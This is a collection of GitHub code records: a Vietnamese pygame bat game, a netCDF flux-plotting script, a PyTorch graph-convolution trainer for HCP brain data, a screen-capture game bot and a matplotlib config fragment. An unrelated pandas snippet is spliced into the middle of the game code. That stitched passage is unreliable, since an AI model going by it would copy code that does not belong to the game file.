= 0\nbat = danh_sach_doi[gia_tri_cua_doi]\n\n# Tạo timer cho bat \ndoi_bay = pygame.USEREVENT + 1 \npygame.time.set_timer(doi_bay,250)\ndoi_hinh_chu_nhat = bat.get_rect(center=(100,380))\n#bat = 
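A pandas sketch (assumed column names matching the dicts built in _compare) of the per-window statistics the comparison collects: issues closed inside [last_month, current) and the mean time-to-close for that window.

import pandas as pd

issues = pd.DataFrame({
    "state": ["closed", "closed", "open"],
    "closed_at": pd.to_datetime(["2023-05-10", "2023-03-01", pd.NaT]),
    "close_len": [12, 40, -1],
})
last_month = pd.Timestamp("2023-05-01")
current = pd.Timestamp("2023-06-01")

window = issues[(issues.state != "open")
                & (issues.closed_at >= last_month)
                & (issues.closed_at < current)]
print(len(window))                 # 1 issue closed inside the window
print(window.close_len.mean())     # 12.0 days on average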
pygame.image.load(\"assets/images/bluebat-midflap.png\").convert_alpha()\n#bat = pygame.transform.scale2x(bat)\n# Tạo ống\nbe_mat_ong_tao_ra = pygame.image.load(\"assets/pipe-gray.png\").convert()\nbe_mat_ong_tao_ra = pygame.transform.scale2x(be_mat_ong_tao_ra)\ndanh_sach_ong = [] \n# tạo timer\nsinh_ra_ong = pygame.USEREVENT # bien sinh_ra_ong tao thoi gian spawn ong\npygame.time.set_timer(sinh_ra_ong, 1200)\n#chieu cao cua ong\nchieu_cao_ong = [300,400,450] \n#Tạo màn hình kết thúc\ngame_over_surface = pygame.transform.scale2x(pygame.image.load(\"assets/Main-game.png\")).convert_alpha()\ngame_over_rect = game_over_surface.get_rect(center = (216,364))\n#chèn âm thanh\nam_thanh_dap_canh = pygame.mixer.Sound(\"sound/sfx_wing.wav\")\nam_thanh_va_cham = pygame.mixer.Sound(\"sound/sfx_hit.wav\")\nam_thanh_diem = pygame.mixer.Sound(\"sound/sfx_point.wav\")\nam_thanh_diem_countdown = 100\n# Vòng lặp while true để thực hiện game hoạt động\nwhile True:\n\n for event in pygame.event.get(): #Bắt sự kiện \n if event.type == pygame.QUIT: #Khi người chơi bấm vào nút x sẽ thoát khỏi trò chơi\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE and hoat_dong_cua_tro_choi: # khi người chơi nhấn nút space bar sẽ bắt dầu chơi và bắt đâu trò chơi\n di_chuyen_cua_doi = 0\n di_chuyen_cua_doi -= 12\n am_thanh_dap_canh.play()\n if event.key == pygame.K_SPACE and hoat_dong_cua_tro_choi==False:\n hoat_dong_cua_tro_choi = True\n danh_sach_ong.clear()\n doi_hinh_chu_nhat.center = (100,300)\n di_chuyen_cua_doi = 0\n diem = 0\n if event.type == sinh_ra_ong:\n danh_sach_ong.extend(tao_ong())\n if event.type == doi_bay:\n if gia_tri_cua_doi < 2 :\n gia_tri_cua_doi += 1\n else:\n gia_tri_cua_doi = 0\n doi_hinh_chu_nhat = hoat_anh_cua_doi()\n man_hinh.blit(hinh_nen_game,(0,0))\n # btn1.draw()\n if hoat_dong_cua_tro_choi :\n # Chim di chuyển và đi qua ống\n di_chuyen_cua_doi += do_roi\n rotated_bat = xoay_doi_tuong(bat) \n doi_hinh_chu_nhat.centery += di_chuyen_cua_doi\n man_hinh.blit(rotated_bat, doi_hinh_chu_nhat)\n hoat_dong_cua_tro_choi = kiem_tra_va_cham(danh_sach_ong)\n #Của ống \n danh_sach_ong = di_chuyen_ong(danh_sach_ong)\n ve_ong(danh_sach_ong)\n #Điểm\n diem += 0.01\n hien_thi_diem(\"main game\")\n am_thanh_diem_countdown -= 100\n if am_thanh_diem_countdown <= 0:\n am_thanh_diem.play()\n am_thanh_diem_countdown = 100\n else:\n man_hinh.blit(game_over_surface,game_over_rect)\n diem_cao = cap_nhat_diem_hien_tai(diem,diem_cao)\n hien_thi_diem(\"game_over\")\n game_over = pygame.transform.scale2x(pygame.image.load(\"assets/gameover.png\"))\n # Của sàn \n san_x_pos -= 1\n ve_san()\n if san_x_pos <= -432:\n san_x_pos = 0\n \n pygame.display.update()\n clock.tick(90) # Điều khiển thời gian FPS 120 \n\n\n ","repo_name":"SideWay0101H/flappy_bat","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41616994761","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 2 15:17:41 2018\n\n@author: elynn\n\"\"\"\nfrom netCDF4 import Dataset\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(style=\"ticks\",font_scale=1.1)\ndef draw_z_grid_background(ax,zm,xmin,xmax):\n for z in range(len(zm)):\n ax.plot([xmin,xmax],[zm[z],zm[z]],color='gray',alpha=0.7,lw=0.5)\nradtyp4 = 
Dataset('/mnt/lab_45d1/database/Sc_group/uclales_output/archive/2xPBL_or_1km/NKX_20170511/hr_4_18_60min/NKX_20170511.ps.nc')\nradtyp2 = Dataset('/mnt/lab_45d1/database/Sc_group/uclales_output/NKX_20170511/hr_4_18_60min/NKX_20170511.ps.nc')\nthetaL_4 = radtyp4['lflxu'][:,:]-radtyp4['lflxd'][:,:]\nthetaL_2 = radtyp2['rflx']#radtyp2['lflxu'][:,:]-radtyp2['lflxd'][:,:]\ntime = radtyp2['time'][:]\nz_2 = radtyp2['zm'][:] \nz_4 = radtyp4['zm'][:]\nt_index = 1\nplt.figure(figsize=(5,8))\nax1 = plt.subplot(111)\ncolors2 = sns.cubehelix_palette(8, start=2, rot=0.05, dark=0, light=.95, reverse=True)\ndraw_z_grid_background(ax1,z_4,thetaL_2[55,:].min()-1,thetaL_4[55,:].max()+1)\nplt.plot(thetaL_2[t_index,:],z_2,'--',color='blue')\nplt.plot(thetaL_4[t_index,:],z_4,'--',color='red')\nplt.plot(thetaL_2[55,:],z_2,color='blue',label='radtype 2')\nplt.plot(thetaL_4[55,:],z_4,color='red',label='radtype 4')\nplt.legend(loc=0)\n#plt.xlim([thetaL_2[t_index,:].min()-1,310.])#thetaL_2[t_index,:].max()+1])\nplt.ylim([0,2000])\nplt.xlabel(r'Net LW radiative flux $[W/m^2]$')\n#plt.xlabel(r'$\\theta_l [K]$')\nplt.ylabel(r'z [m]')\n#plt.savefig('/mnt/lab_45d1/database/Sc_group/LES_analysis/radtyp2_vs_4/NKX_20170511_net_LW_hr6_and_hr20.png',dpi=200,bbox_inches='tight')","repo_name":"mzamora/Sc-utils","sub_path":"uclalesUtils/python/radtype2_vs_4.py","file_name":"radtype2_vs_4.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"41525370667","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nfrom tgcn.nn.gcn import gcn_pool, gcn_pool_4, ChebConv, ChebTimeConv\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport autograd.numpy as npa\nfrom load.data_hcp import load_hcp_example, FullDataset\nimport gcn.graph as graph\nimport gcn.coarsening as coarsening\nimport sklearn.metrics\nimport time, math, random, os\nimport scipy.sparse as sp\nimport configparser\nfrom util.path import get_root\n\n\nclass NetMLP(nn.Module):\n\n def __init__(self, sh):\n\n super(NetMLP, self).__init__()\n\n c = 512\n self.fc1 = torch.nn.Linear(sh, c)\n\n d = 1024\n self.fc2 = torch.nn.Linear(c, d)\n\n e= 750\n self.fc3 = nn.Linear(d, e)\n\n f=15000\n self.fc4 = nn.Linear(e, f)\n\n g = 400\n self.fc5 = nn.Linear(f, g)\n\n h = 6\n self.fc6 = nn.Linear(g, h)\n\n\n def forward(self, x):\n x = x.view(x.shape[0], -1)\n x = self.fc1(x)\n x = self.fc2(x)\n x = self.fc3(x)\n x = self.fc4(x)\n x = self.fc5(x)\n x = self.fc6(x)\n return F.log_softmax(x, dim=1)\n\n\nclass NetTGCN(torch.nn.Module):\n def __init__(self, graphs, coos):\n super(NetTGCN, self).__init__()\n\n f1, g1, k1, h1 = 1, 32, 25, 15\n self.conv1 = ChebTimeConv(f1, g1, K=k1, H=h1)\n\n self.drop1 = nn.Dropout(0.1)\n\n g2, k2 = 64, 25\n self.conv2 = ChebConv(g1, g2, K=k2)\n\n n2 = graphs[0].shape[0]\n\n c = 6#512\n self.fc1 = torch.nn.Linear(int(n2 * g2), c)\n\n #self.dense1_bn = nn.BatchNorm1d(d)\n #self.drop2 = nn.Dropout(0.5)\n\n d = 6\n self.fc2 = torch.nn.Linear(c, d)\n\n self.coos = coos\n\n def forward(self, x):\n #x = torch.tensor(npa.real(npa.fft.fft(x.to('cpu').numpy(), axis=2))).to('cuda')\n x, edge_index = x, self.coos[0].to(x.device)\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n #x = gcn_pool_4(x)\n\n #x = self.drop1(x)\n\n edge_index = self.coos[0].to(x.device)\n x = self.conv2(x, edge_index)\n x = F.relu(x)\n #x = gcn_pool_4(x)\n\n x = x.view(x.shape[0], -1)\n x = 
self.fc1(x)\n\n #x = self.dense1_bn(x)\n #x = F.relu(x)\n #x = self.drop2(x)\n\n #x = self.fc2(x)\n return F.log_softmax(x, dim=1)\n\n\nclass NetTGCNBasic(torch.nn.Module):\n def __init__(self, mat_size):\n super(NetTGCNBasic, self).__init__()\n\n f1, g1, k1, h1 = 1, 64, 25, 15\n self.conv1 = ChebTimeConv(f1, g1, K=k1, H=h1)\n\n n2 = mat_size\n\n c = 6\n self.fc1 = torch.nn.Linear(int(n2 * g1), c)\n\n self.coos = None\n self.perm = None\n\n def add_graph(self, coos, perm):\n self.coos = coos\n self.perm = perm\n\n def forward(self, x):\n #x = torch.tensor(npa.real(npa.fft.fft(x.to('cpu').numpy(), axis=2))).to('cuda')\n x, edge_index = x, self.coos[0]#.to(x.device)\n x = self.conv1(x, edge_index)\n\n x = F.relu(x)\n\n x = x.view(x.shape[0], -1)\n x = self.fc1(x)\n\n return F.log_softmax(x, dim=1)\n\n\ndef perm_data_time(x, indices):\n \"\"\"\n Permute data matrix, i.e. exchange node ids,\n so that binary unions form the clustering tree.\n \"\"\"\n if indices is None:\n return x\n\n N, M, Q = x.shape\n Mnew = len(indices)\n assert Mnew >= M\n xnew = np.empty((N, Mnew, Q))\n for i,j in enumerate(indices):\n # Existing vertex, i.e. real data.\n if j < M:\n xnew[:, i, :] = x[:, j, :]\n # Fake vertex because of singeltons.\n # They will stay 0 so that max pooling chooses the singelton.\n # Or -infty ?\n else:\n xnew[:, i, :] = np.zeros((N, Q))\n return xnew\n\n\ndef create_graph(device, shuffled=False):\n def grid_graph(m, corners=False):\n z = graph.grid(m)\n dist, idx = graph.distance_sklearn_metrics(z, k=number_edges, metric=metric)\n A = graph.adjacency(dist, idx)\n\n if shuffled:\n B = A.toarray()\n B = list(B[np.triu_indices(A.shape[0])])\n random.shuffle(B)\n A = np.zeros((A.shape[0], A.shape[0]))\n indices = np.triu_indices(A.shape[0])\n A[indices] = B\n A = A + A.T - np.diag(A.diagonal())\n A = sp.csr_matrix(A)\n\n # Connections are only vertical or horizontal on the grid.\n # Corner vertices are connected to 2 neightbors only.\n if corners:\n import scipy.sparse\n A = A.toarray()\n A[A < A.max() / 1.5] = 0\n A = scipy.sparse.csr_matrix(A)\n print('{} edges'.format(A.nnz))\n\n print(\"{} > {} edges\".format(A.nnz // 2, number_edges * m ** 2 // 2))\n return A\n\n number_edges= 8\n metric = 'euclidean'\n normalized_laplacian = True\n coarsening_levels = 4\n\n A = grid_graph(28, corners=False)\n #A = graph.replace_random_edges(A, 0)\n graphs, perm = coarsening.coarsen(A, levels=coarsening_levels, self_connections=False)\n return graphs, perm\n\n\ndef load_hcp_tcgn(device):\n\n time_series, labels, As = load_hcp_example(full=True)\n\n normalized_laplacian = True\n coarsening_levels = 4\n shuffled=False\n\n A = As[0]\n #A = arr.todense()\n\n if shuffled:\n B = A.toarray()\n B = list(B[np.triu_indices(A.shape[0])])\n random.shuffle(B)\n A = np.zeros((A.shape[0], A.shape[0]))\n indices = np.triu_indices(A.shape[0])\n A[indices] = B\n A = A + A.T - np.diag(A.diagonal())\n A = sp.csr_matrix(A)\n graphs, perm = coarsening.coarsen(A, levels=coarsening_levels, self_connections=False)\n #else:\n W = sp.random(As[0].shape[0], As[0].shape[0], density=0, format='csr',\n data_rvs=lambda s: np.random.uniform(0, 1, size=s))\n\n #graphs, perm = coarsening.coarsen(W, levels=coarsening_levels, self_connections=False)\n #graphs = [As[0]]\n graphs = [W]\n\n coos = [torch.tensor([graph.tocoo().row, graph.tocoo().col], dtype=torch.long).to(device) for graph in graphs]\n\n idx_train = range(int(0.8*time_series.shape[0]))\n print('Size of train set: {}'.format(len(idx_train)))\n\n idx_test = range(len(idx_train), 
time_series.shape[0])\n print('Size of test set: {}'.format(len(idx_test)))\n\n train_data = time_series[idx_train]\n train_labels = labels[idx_train]\n test_data = time_series[idx_test]\n test_labels = labels[idx_test]\n\n #train_data = perm_data_time(train_data, perm)\n #test_data = perm_data_time(test_data, perm)\n\n return graphs, coos, train_data, test_data, train_labels, test_labels\n\n\ndef train(args, model, device, train_loader, optimizer, epoch, verbose=False):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n target = torch.argmax(target, dim=1)\n k = 1.\n w = torch.tensor([1., k, k, k, k, k]).to(device)\n loss = F.nll_loss(output, target, weight=w)\n for p in model.named_parameters():\n if p[0].split('.')[0][:2] == 'fc':\n loss = loss + args.reg_weight*(p[1]**2).sum()\n loss.backward()\n optimizer.step()\n if verbose:\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\n\ndef train_minibatch(args, model, device, train_loader, optimizer, epoch, verbose=False):\n train_loss = 0\n model.train()\n minibatch = 10\n for batch_idx, (data, target, coos, perm) in enumerate(train_loader):\n #data, target = data.to(device), target.to(device)\n #F = 1024 ** 2\n #print('Bytes of Data: {:1.4f} MB.'.format(getsizeof(data) / F))\n coos = [c[0].to(device) for c in coos]\n #ctr = 0\n target = target.to(device)\n temp_loss = 0\n model.module.add_graph(coos, perm)\n\n for i in range(len(data)):\n optimizer.zero_grad()\n output = model(data[i].to(device))\n expected = torch.argmax(target[:, i], dim=1)\n k = 1.\n w = torch.tensor([1., k, k, k, k, k]).to(device)\n loss = F.nll_loss(output, expected, weight=w)\n\n loss = loss / minibatch\n\n train_loss += loss\n temp_loss += loss\n for p in model.named_parameters():\n if p[0].split('.')[0][:2] == 'fc':\n loss = loss + args.reg_weight*(p[1]**2).sum()\n\n loss.backward()\n\n if batch_idx % minibatch == 0:\n optimizer.step()\n\n #ctr += 1\n\n if verbose:\n #if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx, len(train_loader.dataset),\n 100. 
* batch_idx / len(train_loader.dataset), temp_loss.item()))\n\n train_loss /= (len(train_loader.dataset) * len(data))\n return train_loss\n\n\ndef test(args, model, device, test_loader, t1, epoch):\n model.eval()\n test_loss = 0\n correct = 0\n preds = torch.empty(0, dtype=torch.long).to(device)\n targets = torch.empty(0, dtype=torch.long).to(device)\n with torch.no_grad():\n for data_t, target_t, coos, perm in test_loader:\n coos = [c[0].to(device) for c in coos]\n #data = data_t[0].to(device)\n target = target_t.to(device)\n\n model.module.add_graph(coos, perm)\n for i in range(len(data_t)):\n output = model(data_t[i].to(device))\n expected = torch.argmax(target[:, i], dim=1)\n test_loss += F.nll_loss(output, expected, reduction='sum').item()\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n preds = torch.cat((pred, preds))\n targets = torch.cat((expected, targets))\n correct += pred.eq(expected.view_as(pred)).sum().item()\n\n #output = model(data)\n #target = torch.argmax(target, dim=1)\n #test_loss += F.nll_loss(output, expected, reduction='sum').item() # sum up batch loss\n\n\n test_loss /= (len(test_loader.dataset) * len(data_t))\n\n # print('Test Epoch: {} Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)'.format(\n # epoch, test_loss, correct, len(test_loader.dataset),\n # 100. * correct / len(test_loader.dataset)))\n\n return test_loss, correct\n #print(sklearn.metrics.classification_report(targets.to('cpu').numpy(), preds.to('cpu').numpy()))\n\n\nclass Dataset(torch.utils.data.Dataset):\n 'Characterizes a dataset for PyTorch'\n def __init__(self, images, labels):\n 'Initialization'\n self.labels = labels\n self.images = images\n\n def __len__(self):\n 'Denotes the total number of samples'\n return len(self.images)\n\n def __getitem__(self, index):\n 'Generates one sample of data'\n # Select sample\n # X = torch.tensor(self.images[index], dtype=torch.float)\n X = self.images[index].astype('float32')\n # Load data and get label\n y = self.labels[index].astype('float32')\n\n return X, y\n\n\ndef seed_everything(seed=1234):\n random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef decode(y_hat, H, Gp, Gn):\n T = len(y_hat)\n N = T + H - 1\n y_decoded = [0] * N\n i = 0\n\n while (i < T - 3):\n num_agree = ((int(y_hat[i] == y_hat[i + 1] != 0)) +\n (int(y_hat[i] == y_hat[i + 2] != 0)) +\n (int(y_hat[i] == y_hat[i + 3] != 0)))\n if (num_agree > 1):\n y_decoded[i + Gn] = y_hat[i]\n i += H\n else:\n i += 1\n return np.array(y_decoded)\n\n\ndef holdout_delabeled(model, data):\n H = 12\n y_holdout = model(data)\n y_holdout = np.reshape(y_holdout, (20, 284 - H + 1))\n\n num_patients = y_holdout.shape[0]\n y_decoded = np.zeros((num_patients, 284))\n Gp, Gn = 4, 4\n for i in range(y_holdout.shape[0]):\n y_decoded[i, :] = decode(y_holdout[i, :], H, Gp, Gn)\n\n return y_decoded\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=1, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=50, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.001, 
metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.5, metavar='M',\n help='SGD momentum (default: 0.5)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n\n parser.add_argument('--save-model', action='store_true', default=False,\n help='For Saving the current Model')\n args = parser.parse_args()\n\n args.reg_weight = 5.e-4\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n #device = torch.device(\"cpu\")\n\n normalized_laplacian = True\n coarsening_levels = 4\n\n settings = configparser.ConfigParser()\n settings_dir = os.path.join(get_root(), 'load/res/hcp_loader.ini')\n settings.read(settings_dir)\n\n\n # kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n data_type = 'aparc'\n if data_type == 'dense':\n mat_size = 59412\n else:\n mat_size = 148\n\n train_set = FullDataset(device, settings, data_type, test=False)\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=False)\n\n test_set = FullDataset(device, settings, data_type, test=True)\n test_loader = torch.utils.data.DataLoader(test_set, batch_size=args.batch_size, shuffle=False)\n\n model = NetTGCNBasic(mat_size)\n #model = NetMLP(int(graphs[0].shape[0] * 15))\n\n if torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model.to(device)\n\n pytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(pytorch_total_params)\n\n #optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n optimizer = optim.Adam(model.parameters(), lr=args.lr)\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.95)\n for epoch in range(1, args.epochs + 1):\n t1 = time.time()\n train_loss = train_minibatch(args, model, device, train_loader, optimizer, epoch, verbose=True)\n scheduler.step()\n test_loss, correct = test(args, model, device, test_loader, t1, epoch)\n\n print('Epoch: {} Training loss: {:1.3e}, Test loss: {:1.3e}, Accuracy: {}/{} ({:.2f}%)'.format(\n epoch, train_loss, test_loss, correct, len(test_loader.dataset) * 270,\n 100. 
* correct / (len(test_loader.dataset) * 270)))\n\n if args.save_model:\n torch.save(model.state_dict(), \"hcp_cnn_1gpu2.pt\")\n\n\nif __name__ == '__main__':\n seed_everything(76)\n main()\n\n\n\n","repo_name":"cassianobecker/tgcn","sub_path":"examples/pytorch_geo_based/pygeo_hcp.py","file_name":"pygeo_hcp.py","file_ext":"py","file_size_in_byte":16113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"36722714604","text":"import os\nimport time\nimport cv2\nimport mss\nimport numpy as np\nimport pynput\nfrom pynput.keyboard import Key\nimport pytesseract\n# from keras.models import Sequential, load_model\n\n\nkeys_pressed = {\n \"Key.up\": False,\n \"Key.left\": False,\n \"Key.right\": False,\n}\n\nrun = True\n\n\ndef main():\n print(\"AI ON\")\n keyboard_controller = pynput.keyboard.Controller()\n mouse_controller = pynput.mouse.Controller()\n\n # listen for key presses\n\n def on_press(key):\n # print(\"\\nkey pressed\", key, end=\"\\n\\n\")\n\n if key == Key.esc:\n print(\"esc pressed\")\n listener.stop()\n global run\n run = False\n return False\n\n for key_from_dict in keys_pressed:\n if key_from_dict == str(key):\n keys_pressed[key_from_dict] = True\n\n def on_release(key):\n # print(\"\\nkey released\", key, end=\"\\n\")\n\n for key_from_dict in keys_pressed:\n if key_from_dict == str(key):\n keys_pressed[key_from_dict] = False\n\n listener = pynput.keyboard.Listener(\n on_press=on_press,\n on_release=on_release)\n listener.start()\n\n # main loop\n millis_old = time.time()\n i = 0\n\n predictions = [\n \"left\", \"left_up\", \"noop\", \"right\", \"right_up\", \"up\"\n ]\n\n # model = load_model(\"model_v4.h5\")\n image_resolution = 256\n\n left_light_image = cv2.imread(\"light_small.png\")\n\n fps = 0\n fps_alpha = 0.9\n\n with mss.mss() as sct:\n monitor_1024 = {\"top\": -1050, \"left\": 1300, \"width\": 1024, \"height\": 1024}\n monitor_full = {\"top\": -1080, \"left\": 860, \"width\": 1920, \"height\": 1080}\n monitor_score = {\"top\": -1040, \"left\": 930, \"width\": 350, \"height\": 85}\n score = 0\n\n image = None\n alive = False\n # get current date with milliseconds\n run_name = time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.localtime())\n print(\"run_name\", run_name)\n # create folder for this run\n os.mkdir(\"detection/\" + run_name)\n while run:\n elapsed = time.time() - millis_old\n millis_old = time.time()\n\n # mouse position\n # print(\"mouse position\", mouse_controller.position, elapsed, end=\"\\r\")\n\n # if (i % 2 == 0):\n # keyboard_controller.press(Key.up)\n # keyboard_controller.press(Key.left)\n\n # else:\n # keyboard_controller.release(Key.up)\n # keyboard_controller.release(Key.left)\n\n # if i > 0:\n # name = \"training/\"\n # if (keys_pressed[\"Key.left\"]):\n # name += \"left\"\n # if (keys_pressed[\"Key.up\"]):\n # name += \"_up\"\n # elif (keys_pressed[\"Key.right\"]):\n # name += \"right\"\n # if (keys_pressed[\"Key.up\"]):\n # name += \"_up\"\n # elif (keys_pressed[\"Key.up\"]):\n # name += \"up\"\n # else:\n # name += \"noop\"\n # name += \"/\" + str(random.randint(0, 100000000000000000)) + \".png\"\n # cv2.imwrite(name, image)\n\n image = np.array(sct.grab(monitor_full))\n # cv2.imwrite(\"last.png\", image)\n # image = np.array(\n\n # sct.shot(mon=2, output=\"last.png\")\n\n # cv2.imshow(\"image\", image)\n # cv2.waitKey(1)\n # image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n # # get average color rgb\n # area_for_average_color = 
image[100:200, 100:200]\n # average_color = np.average(area_for_average_color, axis=(0, 1))\n # average_color_rgb = [average_color[2], average_color[1], average_color[0]]\n\n # dead_color_rgb = [187, 132, 255]\n # alive_color_rgb = [47, 100, 83]\n\n # if np.allclose(average_color_rgb, dead_color_rgb, atol=20):\n # alive = False\n # # time.sleep(1)\n\n # if np.allclose(average_color_rgb, alive_color_rgb, atol=20):\n # alive = True\n\n # get location of left light\n # light_location_result = cv2.matchTemplate(image, left_light_image, cv2.TM_SQDIFF_NORMED)\n # _, _, light_loc_top_left, _ = cv2.minMaxLoc(light_location_result)\n # light_bottom_right = (light_loc_top_left[0] + left_light_image.shape[1], light_loc_top_left[1] + left_light_image.shape[0])\n # cv2.rectangle(image, light_loc_top_left, light_bottom_right, 255, 2)\n\n # cv2.imshow(\"image\", image)\n # cv2.waitKey(1)\n\n # # move mouse to light slowly\n # light_pos_screen = (light_loc_top_left[0] + 1300, light_loc_top_left[1] - 1050)\n # # mouse_controller.position = light_pos_screen\n # mouse_controller.move(light_pos_screen[0] - mouse_controller.position[0], light_pos_screen[1] - mouse_controller.position[1])\n\n # cv2.imwrite(\"detection/\" + run_name + \"/\" + run_name + str(i) + \".png\", image)\n\n # text = pytesseract.image_to_string(image)\n # text_clean = text.replace(\"\\n\", \"\")\n # text_clean = text_clean.replace(\" \", \"\")\n # # keep only numbers\n # text_clean = ''.join(filter(str.isdigit, text_clean))\n # if text_clean != \"\":\n # new_score = int(text_clean)\n # if new_score > score:\n # if score < 1_000_000:\n # score = new_score\n fps = (1 / elapsed) * (1 - fps_alpha) + fps * fps_alpha\n\n print(\"time: \", format(elapsed, \".3f\"), \"s\", \"fps: \", format(fps, \".0f\"), end=\"\\n\\n\")\n\n # image = cv2.resize(image, (image_resolution, image_resolution))\n # image = np.array(image)\n # image = image.reshape(1, image_resolution, image_resolution, 3)\n # image = image / 255\n # millis_after_image_processing = time.time()\n\n # prediction = model.predict(image, verbose=0)\n # millis_after_prediction = time.time()\n # prediction_text = predictions[np.argmax(prediction)]\n\n # print(\"AI input: \", prediction_text, \" \", end=\"\\r\")\n\n # if prediction_text == \"left\":\n # keyboard_controller.press(keyboard_controller._Key.left)\n # keyboard_controller.release(keyboard_controller._Key.right)\n # keyboard_controller.release(keyboard_controller._Key.up)\n # elif prediction_text == \"left_up\":\n # keyboard_controller.press(keyboard_controller._Key.left)\n # keyboard_controller.press(keyboard_controller._Key.up)\n # keyboard_controller.release(keyboard_controller._Key.right)\n # elif prediction_text == \"noop\":\n # keyboard_controller.release(keyboard_controller._Key.left)\n # keyboard_controller.release(keyboard_controller._Key.right)\n # keyboard_controller.release(keyboard_controller._Key.up)\n # elif prediction_text == \"right\":\n # keyboard_controller.press(keyboard_controller._Key.right)\n # keyboard_controller.release(keyboard_controller._Key.left)\n # keyboard_controller.release(keyboard_controller._Key.up)\n # elif prediction_text == \"right_up\":\n # keyboard_controller.press(keyboard_controller._Key.right)\n # keyboard_controller.press(keyboard_controller._Key.up)\n # keyboard_controller.release(keyboard_controller._Key.left)\n # elif prediction_text == \"up\":\n # keyboard_controller.press(keyboard_controller._Key.up)\n # keyboard_controller.release(keyboard_controller._Key.left)\n # 
keyboard_controller.release(keyboard_controller._Key.right)\n\n # time.sleep(0.01)\n i += 1\n\n # exit\n cv2.destroyAllWindows()\n sct.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"turcottep/run_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74011575615","text":"import os, sys\nimport numpy as np\nimport matplotlib.pylab as plt\nroot_dir = os.path.dirname(os.getcwd()) + '/'\nsubDirectories = [x[0] for x in os.walk(root_dir)]\nsys.path.extend(subDirectories)\nfrom tools import *\n\nimport matplotlib\nmatplotlib.font_manager.findSystemFonts(fontpaths=['/home/bruno/fonts/Helvetica'], fontext='ttf')\nmatplotlib.rcParams['font.sans-serif'] = \"Helvetica\"\nmatplotlib.rcParams['font.family'] = \"sans-serif\"\nmatplotlib.rcParams['mathtext.fontset'] = 'cm'\nmatplotlib.rcParams['mathtext.rm'] = 'serif'\n\nlegendsize = 12\nif system == 'Tornado': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/bruno/fonts/Helvetica', \"Helvetica.ttf\"), size=legendsize)\nif system == 'Eagle': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/bruno/fonts/Helvetica', \"Helvetica.ttf\"), size=legendsize)\nif system == 'xps': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/bruno/fonts/Helvetica', \"Helvetica.ttf\"), size=legendsize)\nif system == 'Lux': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/brvillas/fonts', \"Helvetica.ttf\"), size=legendsize)\nif system == 'Shamrock': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/bruno/fonts/Helvetica', \"Helvetica.ttf\"), size=legendsize)\nif system == 'Mac_mini': prop = None\nif system == 'MacBook': prop = None\n\nfigure_width = 8\nborder_width = 1\n\ntick_size_major, tick_size_minor = 5, 3\ntick_label_size_major, tick_label_size_minor = 11, 10\ntick_width_major, tick_width_minor = 1.5, 1\nlabel_size = 12\nlegend_size = 9\n\n\n# Font Sizes\nfontsize_label = 